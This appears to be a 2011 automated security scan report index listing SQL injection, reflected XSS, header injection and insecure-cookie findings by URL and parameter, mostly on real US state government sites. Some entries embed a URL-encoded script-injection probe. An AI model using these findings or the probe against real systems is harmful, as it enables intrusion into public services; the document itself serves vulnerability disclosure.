XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB Report 4-30-2011

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Sat Apr 30 17:35:25 CDT 2011.


Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Loading

1. SQL injection

1.1. https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp [hdn_Language parameter]

1.2. http://pa.gov/portal/server.pt/gateway/PTARGS_0_2_24662_2966_368351_43/http [REST URL parameter 3]

1.3. http://pa.gov/portal/server.pt/gateway/PTARGS_0_2_24825_2966_368351_43/http [REST URL parameter 3]

1.4. http://pa.gov/portal/server.pt/gateway/PTARGS_0_2_24879_2966_368351_43/http [REST URL parameter 3]

1.5. http://www.alabama.gov/portal/index.jsp [User-Agent HTTP header]

1.6. http://www.budget.state.pa.us/portal/server.pt/gateway/PTARGS_0_2_38668_4566_458236_43/http [REST URL parameter 3]

1.7. http://www.budget.state.pa.us/portal/server.pt/gateway/PTARGS_0_2_39070_4566_458236_43/http [REST URL parameter 3]

1.8. http://www.vsea.org/join-your-union [name of an arbitrarily supplied request parameter]

1.9. http://www.vsea.org/sites/vsea.org/themes/unionproud2/favicon.ico [REST URL parameter 3]

1.10. http://www.vsea.org/sites/vsea.org/themes/unionproud2/splash_flash/slideShow.swf [REST URL parameter 3]

2. HTTP header injection

2.1. http://bs.serving-sys.com/BurstingPipe/adServer.bs [bwVal parameter]

2.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

2.3. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

2.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

2.5. http://wbtdcs.nara.gov/dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif [REST URL parameter 1]

3. Cross-site scripting (reflected)

3.1. http://ads.adbrite.com/adserver/vdi/711384 [REST URL parameter 3]

3.2. http://agency.governmentjobs.com/tennessee/default.cfm [name of an arbitrarily supplied request parameter]

3.3. https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp [hdn_SessionId parameter]

3.4. https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp [hdn_Language parameter]

3.5. http://badge.dopiaza.org/flickr/badge.php [name of an arbitrarily supplied request parameter]

3.6. http://badge.dopiaza.org/flickr/badge.php [user parameter]

3.7. http://data.gosquared.com/info [a parameter]

3.8. http://data.ok.gov/api/rdfTerms.json [REST URL parameter 2]

3.9. http://data.ok.gov/api/views/35sq-wrr4/snapshots/page [REST URL parameter 2]

3.10. http://data.ok.gov/api/views/35sq-wrr4/snapshots/page [REST URL parameter 3]

3.11. http://data.ok.gov/api/views/35sq-wrr4/snapshots/page [REST URL parameter 4]

3.12. http://data.ok.gov/api/views/35sq-wrr4/snapshots/page [size parameter]

3.13. http://data.ok.gov/api/views/dz4w-xbzm/snapshots/page [REST URL parameter 2]

3.14. http://data.ok.gov/api/views/dz4w-xbzm/snapshots/page [REST URL parameter 3]

3.15. http://data.ok.gov/api/views/dz4w-xbzm/snapshots/page [REST URL parameter 4]

3.16. http://data.ok.gov/api/views/dz4w-xbzm/snapshots/page [size parameter]

3.17. http://data.ok.gov/api/views/xxvf-kunf/snapshots/page [REST URL parameter 2]

3.18. http://data.ok.gov/api/views/xxvf-kunf/snapshots/page [REST URL parameter 3]

3.19. http://data.ok.gov/api/views/xxvf-kunf/snapshots/page [REST URL parameter 4]

3.20. http://data.ok.gov/api/views/xxvf-kunf/snapshots/page [size parameter]

3.21. http://data.ok.gov/views.json [REST URL parameter 1]

3.22. http://data.ok.gov/views.json [tableId parameter]

3.23. http://data.ok.gov/views/INLINE/rows.json [REST URL parameter 1]

3.24. http://data.ok.gov/views/INLINE/rows.json [REST URL parameter 2]

3.25. http://data.ok.gov/views/INLINE/rows.json [REST URL parameter 3]

3.26. http://data.ok.gov/views/INLINE/rows.json [accessType parameter]

3.27. http://data.ok.gov/views/INLINE/rows.json [length parameter]

3.28. http://data.ok.gov/views/INLINE/rows.json [start parameter]

3.29. http://data.ok.gov/views/dz4w-xbzm.json [REST URL parameter 1]

3.30. http://data.ok.gov/views/dz4w-xbzm.json [REST URL parameter 2]

3.31. http://data.ok.gov/views/dz4w-xbzm.json [accessType parameter]

3.32. http://data.ok.gov/w/dz4w-xbzm/q69b-3vw6 [REST URL parameter 3]

3.33. http://digg.com/submit [REST URL parameter 1]

3.34. http://fonts.gawker.com/k/zvc4iwz-c-6179963-143.eot [REST URL parameter 1]

3.35. http://fonts.gawker.com/k/zvc4iwz-c-6179963-143.eot [REST URL parameter 2]

3.36. http://fonts.gawker.com/k/zvc4iwz-c-6179963-147.eot [REST URL parameter 1]

3.37. http://fonts.gawker.com/k/zvc4iwz-c-6179963-147.eot [REST URL parameter 2]

3.38. http://fonts.gawker.com/k/zvc4iwz-c.css [REST URL parameter 1]

3.39. http://fonts.gawker.com/k/zvc4iwz-c.css [REST URL parameter 2]

3.40. http://frwebgate.access.gpo.gov/cgi-bin/getdoc.cgi [name of an arbitrarily supplied request parameter]

3.41. http://image.providesupport.com/cmd/hic [REST URL parameter 1]

3.42. http://image.providesupport.com/js/hic/safe-standard.js [REST URL parameter 1]

3.43. http://image.providesupport.com/js/hic/safe-standard.js [REST URL parameter 2]

3.44. http://image.providesupport.com/js/hic/safe-standard.js [offline-image parameter]

3.45. http://image.providesupport.com/js/hic/safe-standard.js [offline-image parameter]

3.46. http://image.providesupport.com/js/hic/safe-standard.js [online-image parameter]

3.47. http://image.providesupport.com/js/hic/safe-textlink.js [REST URL parameter 1]

3.48. http://image.providesupport.com/js/hic/safe-textlink.js [REST URL parameter 2]

3.49. http://iot.custhelp.com/cgi-bin/iot.cfg/php/enduser/opensearch.php [callback parameter]

3.50. http://iot.custhelp.com/cgi-bin/iot.cfg/php/enduser/opensearch.php [name of an arbitrarily supplied request parameter]

3.51. http://iot.custhelp.com/cgi-bin/iot.cfg/php/enduser/opensearch.php [startIndex parameter]

3.52. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

3.53. http://kodakimagingnetworki.tt.omtrdc.net/m2/kodakimagingnetworki/mbox/standard [mbox parameter]

3.54. http://landmark-project.com/feed2js/feed2js.php [src parameter]

3.55. http://newbrowse.livehelper.com/servlet/lhBrowse [REST URL parameter 2]

3.56. http://newbrowse.livehelper.com/servlet/lhBrowse [REST URL parameter 2]

3.57. http://newbrowse.livehelper.com/servlet/lhBrowse [REST URL parameter 2]

3.58. http://newbrowse.livehelper.com/servlet/lhBrowse [id parameter]

3.59. http://newchat.livehelper.com/servlet/lhChat [REST URL parameter 2]

3.60. http://newchat.livehelper.com/servlet/lhChat [id parameter]

3.61. http://nv.gov/workarea/csslib/ektronCss.ashx [id parameter]

3.62. http://nv.gov/workarea/java/ektronJs.ashx [id parameter]

3.63. https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php [OLTSite parameter]

3.64. https://onestop.michigan.gov/OneStop/ssoNeedPassword.do [REST URL parameter 2]

3.65. https://onestop.michigan.gov/onestop-main/OneStop/css/a [REST URL parameter 4]

3.66. https://onestop.michigan.gov/onestop-main/OneStop/css/none [REST URL parameter 4]

3.67. https://onestop.michigan.gov/onestop-main/OneStop/ssoRegistration.do [REST URL parameter 3]

3.68. https://pixel.fetchback.com/serve/fb/pdc [name parameter]

3.69. http://serverapi.arcgisonline.com/jsapi/arcgis/ [v parameter]

3.70. http://sussex.de.schoolwebpages.com/education/school/school.php [REST URL parameter 1]

3.71. http://sussex.de.schoolwebpages.com/education/school/school.php [REST URL parameter 2]

3.72. http://sussex.de.schoolwebpages.com/education/school/school.php [REST URL parameter 3]

3.73. http://sussex.de.schoolwebpages.com/favicon.ico [REST URL parameter 1]

3.74. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm [REST URL parameter 1]

3.75. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm [REST URL parameter 2]

3.76. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E [REST URL parameter 1]

3.77. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E [REST URL parameter 2]

3.78. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E [REST URL parameter 2]

3.79. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E [REST URL parameter 3]

3.80. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E [REST URL parameter 4]

3.81. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E [REST URL parameter 4]

3.82. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E [REST URL parameter 5]

3.83. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E [REST URL parameter 5]

3.84. http://tomcat2.dot.state.ga.us/favicon.ico [REST URL parameter 1]

3.85. http://widgets.digg.com/buttons/count [url parameter]

3.86. http://www.addthis.com/bookmark.php [REST URL parameter 1]

3.87. http://www.addthis.com/bookmark.php [REST URL parameter 1]

3.88. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

3.89. http://www.capehenlopenschools.com/education/district/district.php [REST URL parameter 1]

3.90. http://www.capehenlopenschools.com/education/district/district.php [REST URL parameter 2]

3.91. http://www.capehenlopenschools.com/education/district/district.php [REST URL parameter 3]

3.92. http://www.ct.gov/ctportal/cwp/view.asp [a parameter]

3.93. http://www.ct.gov/ctportal/cwp/view.asp [a parameter]

3.94. http://www.ct.gov/ctportal/site/default.asp [name of an arbitrarily supplied request parameter]

3.95. http://www.ct.gov/ctportal/taxonomy/taxonomy.asp [name of an arbitrarily supplied request parameter]

3.96. http://www.delmar.k12.de.us/education/district/district.php [REST URL parameter 1]

3.97. http://www.delmar.k12.de.us/education/district/district.php [REST URL parameter 2]

3.98. http://www.delmar.k12.de.us/education/district/district.php [REST URL parameter 3]

3.99. http://www.delmar.k12.de.us/favicon.ico [REST URL parameter 1]

3.100. http://www.georgia.gov/external/ [url parameter]

3.101. http://www.georgia.gov/external/ [url parameter]

3.102. http://www.georgia.gov/external/ [url parameter]

3.103. http://www.healthynh.com/index-fhc.php [name of an arbitrarily supplied request parameter]

3.104. http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp [name of an arbitrarily supplied request parameter]

3.105. http://www.ms.gov/ms_sub_template.jsp [Category_ID parameter]

3.106. http://www.nv.gov/workarea/csslib/ektronCss.ashx [id parameter]

3.107. http://www.nv.gov/workarea/java/ektronJs.ashx [id parameter]

3.108. http://www.nysegov.com/citGuide.cfm [content parameter]

3.109. http://www.nysegov.com/citGuide.cfm [superCat parameter]

3.110. https://www.scsignon.sc.gov/SCBOS.Core.Framework.Web.UI.Resources.aspx [Resource parameter]

3.111. http://www.sled.state.sc.us/sled/default.asp [name of an arbitrarily supplied request parameter]

3.112. http://www.state.mn.us/portal/mn/jsp/content.do [name of an arbitrarily supplied request parameter]

3.113. http://www.state.mn.us/portal/mn/jsp/contentprocess.do [name of an arbitrarily supplied request parameter]

3.114. http://www.state.mn.us/portal/mn/jsp/home.do [name of an arbitrarily supplied request parameter]

3.115. http://www.state.mn.us/portal/mn/jsp/hybrid.do [name of an arbitrarily supplied request parameter]

3.116. http://www.state.mn.us/portal/mn/jsp/logon.do [name of an arbitrarily supplied request parameter]

3.117. http://www.state.mn.us/portal/mn/jsp/redirectLink.do [name of an arbitrarily supplied request parameter]

3.118. http://www.state.mn.us/portal/mn/jsp/search.do [name of an arbitrarily supplied request parameter]

3.119. https://www.vermontjoblink.com/ada/leavesite.cfm [url parameter]

3.120. https://www.vermontjoblink.com/ada/mn_eligibility_dsp.cfm [rand parameter]

3.121. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [BLTEXTBOXEXTRADONOTUSE1_prev parameter]

3.122. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [CFTEXTBOXEXTRADONOTUSE_prev parameter]

3.123. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [ERRORFIELDS parameter]

3.124. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [FORMID_prev parameter]

3.125. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [FORMNAME_prev parameter]

3.126. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [FormID parameter]

3.127. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [FormName parameter]

3.128. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [FormName parameter]

3.129. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [OLD_CHOICE_prev parameter]

3.130. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [RAND_prev parameter]

3.131. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [SECURITYSYS_prev parameter]

3.132. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [U_name parameter]

3.133. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [bltextboxextradonotuse1 parameter]

3.134. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [bltextboxextradonotuse1 parameter]

3.135. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [cftextboxextradonotuse parameter]

3.136. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [cftextboxextradonotuse parameter]

3.137. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [choice parameter]

3.138. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [errorfields parameter]

3.139. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [formid parameter]

3.140. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [formid parameter]

3.141. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [formname parameter]

3.142. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [library_errormessage parameter]

3.143. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [library_errormessage parameter]

3.144. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [old_choice parameter]

3.145. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [old_choice parameter]

3.146. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [rand parameter]

3.147. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [rand parameter]

3.148. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [rand parameter]

3.149. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [securitysys parameter]

3.150. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [securitysys parameter]

3.151. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [submit parameter]

3.152. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [usvuserid parameter]

3.153. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [usvuserid_ADAdefault parameter]

3.154. https://www.vermontjoblink.com/ada/mn_quicksearch_dsp.cfm [type parameter]

3.155. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm [reg%5Ftype parameter]

3.156. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm [def parameter]

3.157. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm [FormID parameter]

3.158. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm [rand parameter]

3.159. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm [securitysys parameter]

3.160. http://www.visitflorida.com/facebook_logged_in.php [REST URL parameter 1]

3.161. http://www.visitflorida.com/facebook_logged_in.php [REST URL parameter 1]

3.162. http://www.visitflorida.com/florida_vacation_auction/auction_details.php [REST URL parameter 1]

3.163. http://www.visitflorida.com/florida_vacation_auction/auction_details.php [REST URL parameter 2]

3.164. http://www.visitflorida.com/floridalive [REST URL parameter 1]

3.165. http://www.visitflorida.com/floridalive [name of an arbitrarily supplied request parameter]

3.166. http://www.visitflorida.com/images/webcam.php [REST URL parameter 1]

3.167. http://www.visitflorida.com/images/webcam.php [REST URL parameter 2]

3.168. http://www.visitflorida.com/includes/js/footerSurvey.php [REST URL parameter 1]

3.169. http://www.visitflorida.com/includes/js/footerSurvey.php [REST URL parameter 2]

3.170. http://www.visitflorida.com/includes/js/footerSurvey.php [REST URL parameter 3]

3.171. http://www.workoneworks.com/ [name of an arbitrarily supplied request parameter]

3.172. http://www.workoneworks.com/favicon.ico [name of an arbitrarily supplied request parameter]

3.173. https://secure.missingkids.com/missingkids/servlet/CybertipServlet [Referer HTTP header]

3.174. http://www.addthis.com/bookmark.php [Referer HTTP header]

3.175. http://www.addthis.com/bookmark.php [Referer HTTP header]

3.176. http://www.addthis.com/bookmark.php [Referer HTTP header]

3.177. http://www.nist.gov/cgi-bin/exit_nist.cgi [Referer HTTP header]

3.178. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [Referer HTTP header]

3.179. http://image.providesupport.com/js/hic/safe-standard.js [vsid cookie]

3.180. http://image.providesupport.com/js/hic/safe-textlink.js [vsid cookie]

3.181. http://seg.sharethis.com/getSegment.php [__stid cookie]

3.182. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1 [AA002 cookie]

3.183. https://www.nrsservicecenter.com/iApp/ret/content/landing.do [MyNRSSite cookie]

3.184. https://www.nrsservicecenter.com/iApp/ret/landing.do [MyNRSSite cookie]

3.185. https://www.nrsservicecenter.com/iApp/ret/showPage.do [MyNRSSite cookie]

3.186. https://www.vermontjoblink.com/ada [SYSTRANLANGUAGE cookie]

3.187. https://www.vermontjoblink.com/ada [SYSTRANLANGUAGE cookie]

3.188. https://www.vermontjoblink.com/ada/404/404_qry.cfm [SYSTRANLANGUAGE cookie]

3.189. https://www.vermontjoblink.com/ada/404/404_qry.cfm [SYSTRANLANGUAGE cookie]

3.190. https://www.vermontjoblink.com/ada/customization/Vermont/documents/eeoislaw.cfm [SYSTRANLANGUAGE cookie]

3.191. https://www.vermontjoblink.com/ada/customization/Vermont/documents/eeoislaw.cfm [SYSTRANLANGUAGE cookie]

3.192. https://www.vermontjoblink.com/ada/customization/Vermont/documents/privacy.cfm [SYSTRANLANGUAGE cookie]

3.193. https://www.vermontjoblink.com/ada/customization/Vermont/documents/privacy.cfm [SYSTRANLANGUAGE cookie]

3.194. https://www.vermontjoblink.com/ada/customization/Vermont/favicon.ico [SYSTRANLANGUAGE cookie]

3.195. https://www.vermontjoblink.com/ada/customization/Vermont/favicon.ico [SYSTRANLANGUAGE cookie]

3.196. https://www.vermontjoblink.com/ada/default.cfm [SYSTRANLANGUAGE cookie]

3.197. https://www.vermontjoblink.com/ada/default.cfm [SYSTRANLANGUAGE cookie]

3.198. https://www.vermontjoblink.com/ada/etp/etp_newuser_dsp.cfm [SYSTRANLANGUAGE cookie]

3.199. https://www.vermontjoblink.com/ada/etp/etp_newuser_dsp.cfm [SYSTRANLANGUAGE cookie]

3.200. https://www.vermontjoblink.com/ada/leavesite.cfm [SYSTRANLANGUAGE cookie]

3.201. https://www.vermontjoblink.com/ada/leavesite.cfm [SYSTRANLANGUAGE cookie]

3.202. https://www.vermontjoblink.com/ada/mn_eligibility_dsp.cfm [SYSTRANLANGUAGE cookie]

3.203. https://www.vermontjoblink.com/ada/mn_eligibility_dsp.cfm [SYSTRANLANGUAGE cookie]

3.204. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [SYSTRANLANGUAGE cookie]

3.205. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [SYSTRANLANGUAGE cookie]

3.206. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [SYSTRANLANGUAGE cookie]

3.207. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [SYSTRANLANGUAGE cookie]

3.208. https://www.vermontjoblink.com/ada/mn_login_fnc.cfm [SYSTRANLANGUAGE cookie]

3.209. https://www.vermontjoblink.com/ada/mn_login_fnc.cfm [SYSTRANLANGUAGE cookie]

3.210. https://www.vermontjoblink.com/ada/mn_offices_dsp.cfm [SYSTRANLANGUAGE cookie]

3.211. https://www.vermontjoblink.com/ada/mn_offices_dsp.cfm [SYSTRANLANGUAGE cookie]

3.212. https://www.vermontjoblink.com/ada/mn_protectyourself_dsp.cfm [SYSTRANLANGUAGE cookie]

3.213. https://www.vermontjoblink.com/ada/mn_protectyourself_dsp.cfm [SYSTRANLANGUAGE cookie]

3.214. https://www.vermontjoblink.com/ada/mn_quicksearch_dsp.cfm [SYSTRANLANGUAGE cookie]

3.215. https://www.vermontjoblink.com/ada/mn_quicksearch_dsp.cfm [SYSTRANLANGUAGE cookie]

3.216. https://www.vermontjoblink.com/ada/mn_quicksearch_dsp.cfm [SYSTRANLANGUAGE cookie]

3.217. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm [SYSTRANLANGUAGE cookie]

3.218. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm [SYSTRANLANGUAGE cookie]

3.219. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm [SYSTRANLANGUAGE cookie]

3.220. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm [SYSTRANLANGUAGE cookie]

3.221. https://www.vermontjoblink.com/ada/mn_settings_dsp.cfm [SYSTRANLANGUAGE cookie]

3.222. https://www.vermontjoblink.com/ada/mn_settings_dsp.cfm [SYSTRANLANGUAGE cookie]

3.223. https://www.vermontjoblink.com/ada/mn_ssncheck.cfm [SYSTRANLANGUAGE cookie]

3.224. https://www.vermontjoblink.com/ada/mn_ssncheck.cfm [SYSTRANLANGUAGE cookie]

3.225. https://www.vermontjoblink.com/ada/mn_veterans_dsp.cfm [SYSTRANLANGUAGE cookie]

3.226. https://www.vermontjoblink.com/ada/mn_veterans_dsp.cfm [SYSTRANLANGUAGE cookie]

3.227. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm [SYSTRANLANGUAGE cookie]

3.228. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm [SYSTRANLANGUAGE cookie]

3.229. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm [SYSTRANLANGUAGE cookie]

3.230. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm [SYSTRANLANGUAGE cookie]

3.231. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm [SYSTRANLANGUAGE cookie]

3.232. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm [SYSTRANLANGUAGE cookie]

3.233. https://www.vermontjoblink.com/ada/works/FAQ.cfm [SYSTRANLANGUAGE cookie]

3.234. https://www.vermontjoblink.com/ada/works/FAQ.cfm [SYSTRANLANGUAGE cookie]

3.235. https://www.vermontjoblink.com/ada/works/Login.cfm [SYSTRANLANGUAGE cookie]

3.236. https://www.vermontjoblink.com/ada/works/Login.cfm [SYSTRANLANGUAGE cookie]

3.237. https://www.vermontjoblink.com/ada/works/contactus.cfm [SYSTRANLANGUAGE cookie]

3.238. https://www.vermontjoblink.com/ada/works/contactus.cfm [SYSTRANLANGUAGE cookie]

3.239. https://www.vermontjoblink.com/ada/works/employeroverview.cfm [SYSTRANLANGUAGE cookie]

3.240. https://www.vermontjoblink.com/ada/works/employeroverview.cfm [SYSTRANLANGUAGE cookie]

3.241. https://www.vermontjoblink.com/ada/works/joboverview.cfm [SYSTRANLANGUAGE cookie]

3.242. https://www.vermontjoblink.com/ada/works/joboverview.cfm [SYSTRANLANGUAGE cookie]

3.243. https://www.vermontjoblink.com/ada/works/jobsearch.cfm [SYSTRANLANGUAGE cookie]

3.244. https://www.vermontjoblink.com/ada/works/jobsearch.cfm [SYSTRANLANGUAGE cookie]

3.245. https://www.vermontjoblink.com/ada/works/linkview.cfm [SYSTRANLANGUAGE cookie]

3.246. https://www.vermontjoblink.com/ada/works/linkview.cfm [SYSTRANLANGUAGE cookie]

3.247. https://www.vermontjoblink.com/ada/works/resourcesoverview.cfm [SYSTRANLANGUAGE cookie]

3.248. https://www.vermontjoblink.com/ada/works/resourcesoverview.cfm [SYSTRANLANGUAGE cookie]

3.249. https://www.vermontjoblink.com/favicon.ico [SYSTRANLANGUAGE cookie]

3.250. https://www.vermontjoblink.com/favicon.ico [SYSTRANLANGUAGE cookie]

4. Flash cross-domain policy

5. Cleartext submission of password

5.1. http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm

5.2. http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm

5.3. http://digg.com/submit

5.4. http://myflorida.custhelp.com/cgi-bin/myflorida.cfg/php/enduser/acct_login.php

5.5. http://pa.gov/portal/server.pt

5.6. http://www.alabama.gov/portal/index.jsp

5.7. http://www.visitflorida.com/floridalive

5.8. http://www.vsea.org/

5.9. http://www.vsea.org/editorial-lays-out-vermont%26%23039

5.10. http://www.vsea.org/favicon.ico

5.11. http://www.vsea.org/join-vsea

5.12. http://www.vsea.org/join-your-union

5.13. http://www.vsea.org/maine-study-finds-state%26%23039

5.14. http://www.vsea.org/node

5.15. http://www.vsea.org/purchase-vsea-clothing

5.16. http://www.vsea.org/state-hospital%26%23039

6. XML injection

6.1. http://us.mcafee.com/root/basket.asp [Currency cookie]

6.2. http://us.mcafee.com/root/basket.asp [SiteID cookie]

6.3. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [usvuserid parameter]

7. SSL cookie without secure flag set

7.1. https://apps.tn.gov/bizreg/bizregprog

7.2. https://apps.tn.gov/bizreg/tax.jsp

7.3. https://apps.tn.gov/biztax-app/login.html

7.4. https://apps.tn.gov/paams-app/index.htm

7.5. https://apps.tn.gov/paams-app/recover/resetpassword.htm

7.6. https://apps.tn.gov/paams-app/recover/retrieveusermane.htm

7.7. https://assist.dhss.delaware.gov/PGM/ASP/SAACC.asp

7.8. https://assist.dhss.delaware.gov/PGM/ASP/SACOM.asp

7.9. https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp

7.10. https://assist.dhss.delaware.gov/PGM/ASP/SC002.asp

7.11. https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp

7.12. https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp

7.13. https://assist.dhss.delaware.gov/PGM/ASP/SC024.asp

7.14. https://assist.dhss.delaware.gov/PGM/ASP/SC031.asp

7.15. https://dhr.ky.gov/DHRWeb/RS

7.16. https://dotax.ehawaii.gov/efile/user

7.17. https://egov.dnrec.delaware.gov/egovpublic/dnrec/disp

7.18. https://fin.oaks.ohio.gov/psp/FNPRD/

7.19. https://fortress.wa.gov/dol/dolprod/dsdoffices/

7.20. https://georgiawildlife.dnr.state.ga.us/service/login1.asp

7.21. https://hcm.oaks.ohio.gov/psp/HCPRD/

7.22. https://home.mcafee.com/ScriptResource.axd

7.23. https://home.mcafee.com/Secure/Protected/Login.aspx

7.24. https://home.mcafee.com/WebResource.axd

7.25. https://home.mcafee.com/WebServices/AccountWebSvc.asmx/js

7.26. https://home.mcafee.com/secure/cart

7.27. https://home.mcafee.com/secure/cart/

7.28. https://home.mcafee.com/secure/purchase/

7.29. https://iris.custhelp.com/

7.30. https://iris.custhelp.com/app/answers/detail/a_id/936/session/L3RpbWUvMTMwNDEyNDM1OS9zaWQvUlBRT3NLc2s%3D

7.31. https://iris.custhelp.com/app/home

7.32. https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm

7.33. https://license.ohio.gov/lookup/default.asp

7.34. https://louisianadcpretire.gwrs.com/login.do

7.35. https://moversguide.usps.com/icoa/flow.do

7.36. https://nhlicenses.nh.gov/MyLicense%20Verification/Search.aspx

7.37. https://njmvcscheduling.state.nj.us/tc/driverlogin.do

7.38. https://onestop.michigan.gov/OneStop/ssoNeedPassword.do

7.39. https://onestop.michigan.gov/onestop-main/OneStop/ssoRegistration.do

7.40. https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/

7.41. https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/h/

7.42. https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/h/

7.43. https://portal.s4web.state.mn.us/psp/por91ssap_newwin/SELFSERVICE/ENTP/e/

7.44. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login

7.45. https://secure.apps.state.nd.us/dot/mv/mvrenewal/renewal.htm

7.46. https://secure.kentucky.gov/portal/login.aspx

7.47. https://secure.sces.org/PDIC/GatewayServlet

7.48. https://services.georgia.gov/dhr/cspp/do/public/Welcome

7.49. https://ssl.sc.gov/osmbareportfiling/precerttool.aspx

7.50. https://txapps.texas.gov/tolapp/txdl/welcome.dl

7.51. https://txapps.texas.gov/tolapp/viewandpay

7.52. https://unitedalert.com/

7.53. https://web.globalpay.com/taxpayer/default.asp

7.54. https://www.accesskansas.org/businesscenter/index.html

7.55. https://www.alabamainteractive.org/abc_license/

7.56. https://www.colorado.gov/apps/dps/mvvs/public/entry.jsf

7.57. https://www.humanservices.state.pa.us/Compass.Web/

7.58. https://www.humanservices.state.pa.us/idm/managedidmpub/ca12/index.jsp

7.59. https://www.myhealth.va.gov/mhv-portal-web/anonymous.portal

7.60. https://www.ncourt.com/forms/DE/navigation.aspx

